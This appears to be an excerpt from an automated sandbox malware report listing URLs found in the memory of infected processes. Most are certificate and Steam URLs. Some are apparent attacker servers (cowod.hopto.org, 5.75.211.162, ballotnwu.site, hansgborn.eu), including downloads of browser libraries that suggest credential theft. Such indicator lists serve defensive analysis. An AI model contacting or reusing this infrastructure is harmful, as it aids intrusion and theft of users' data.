Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.AFHIJKECFBKJ
Source: RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.ECFBKJ
Source: RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001396000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001396000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/Rj
Source: RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgBKJ
Source: userAFHDHCAAKE.exe, 00000007.00000002.2211440894.0000000003945000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoKECFBKJ
Source: file.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002C47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hansgborn.eu
Source: userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002C47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hansgborn.eud
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe	String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: userBGIJEGCGDG.exe, 00000012.00000002.2484268672.0000000005090000.00000004.08000000.00040000.00000000.sdmp, GIEBGIIJDG.exe, 0000003E.00000002.2939917338.00000000023EF000.00000004.00000800.00020000.00000000.sdmp, GIEBGIIJDG.exe, 0000003E.00000002.2939917338.00000000023D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: userBGIJEGCGDG.exe, 00000012.00000002.2484268672.0000000005090000.00000004.08000000.00040000.00000000.sdmp, GIEBGIIJDG.exe, 0000003E.00000002.2939917338.00000000023EF000.00000004.00000800.00020000.00000000.sdmp, GIEBGIIJDG.exe, 0000003E.00000002.2939917338.00000000023D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002B01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RDPWInst.exe, 0000001A.00000000.2254101327.0000000000401000.00000020.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://stascorp.com/load/1-1-0-62
Source: userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 0000001A.00000002.2307313365.0000000000450000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://stascorp.comDVarFileInfo$
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2356059269.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009323531.0000000001706000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2356059269.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009323531.0000000001706000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2356059269.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009323531.0000000001706000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: RDPWInst.exe, 0000001A.00000002.2307313365.0000000000450000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://www.apache.org/licenses/
Source: RDPWInst.exe, 0000001A.00000002.2307313365.0000000000450000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe	String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000004.00000002.2566258960.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2550690310.000000001B734000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991369822.000000002021D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2981605260.000000001A27D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199780418869[1].htm.10.dr	String found in binary or memory: https://5.75.211.162
Source: RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162.exe
Source: RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000110A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000121B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/
Source: RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/%
Source: RegAsm.exe, 0000003D.00000002.3283819592.000000000110A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/C
Source: RegAsm.exe, 0000003D.00000002.3283819592.0000000001151000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/DBAAF
Source: RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/ets
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/freebl3.dll
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/mozglue.dll
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/msvcp140.dll
Source: RegAsm.exe, 0000000A.00000002.2971689518.00000000012B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/nss3.dll
Source: RegAsm.exe, 0000000A.00000002.2971689518.00000000012B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/nss3.dllE
Source: RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/pet_
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/softokn3.dll
Source: RegAsm.exe, 0000003D.00000002.3280037967.000000000055E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dll
Source: RegAsm.exe, 0000000A.00000002.2971689518.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dlllfonswindir
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/vcruntime140.dll
Source: RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/x
Source: RegAsm.exe, 0000003D.00000002.3280037967.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.1620.5938.132
Source: RegAsm.exe, 0000003D.00000002.3280037967.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162BFIEG
Source: RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162HIJJK
Source: RegAsm.exe, 0000003D.00000002.3280037967.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162rt/form-data;
Source: RegAsm.exe, 0000003D.00000002.3280037967.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162ta
Source: 76561199780418869[1].htm.10.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dcn
Source: RegAsm.exe, 0000003A.00000002.3006610464.0000000001665000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/
Source: RegAsm.exe, 0000003A.00000002.3007548763.000000000168D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/3
Source: RegAsm.exe, 00000011.00000002.2351260581.0000000001371000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/5
Source: RegAsm.exe, 00000011.00000002.2352606132.0000000001387000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/U
Source: RegAsm.exe, 00000011.00000002.2352606132.0000000001387000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3006610464.000000000166D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3007548763.000000000168D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/api
Source: RegAsm.exe, 0000003A.00000002.3007548763.000000000168D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/apik
Source: RegAsm.exe, 0000003A.00000002.3007548763.0000000001676000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/g
Source: RegAsm.exe, 0000003A.00000002.3006610464.0000000001665000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/j
Source: RegAsm.exe, 0000003A.00000002.3006610464.0000000001665000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/m
Source: RegAsm.exe, 00000011.00000002.2351260581.0000000001371000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/o
Source: RegAsm.exe, 0000003A.00000002.3006610464.000000000166D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site:443/api$
Source: RegAsm.exe, 00000011.00000002.2352606132.0000000001387000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site:443/apiprofiles/76561199724331900
Source: RegAsm.exe, 00000004.00000002.2558214387.00000000278D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.0000000001396000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, FCFBFB.10.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: RegAsm.exe, 00000004.00000002.2558214387.00000000278D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.0000000001396000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, FCFBFB.10.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: RegAsm.exe, 0000003D.00000002.3280037967.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
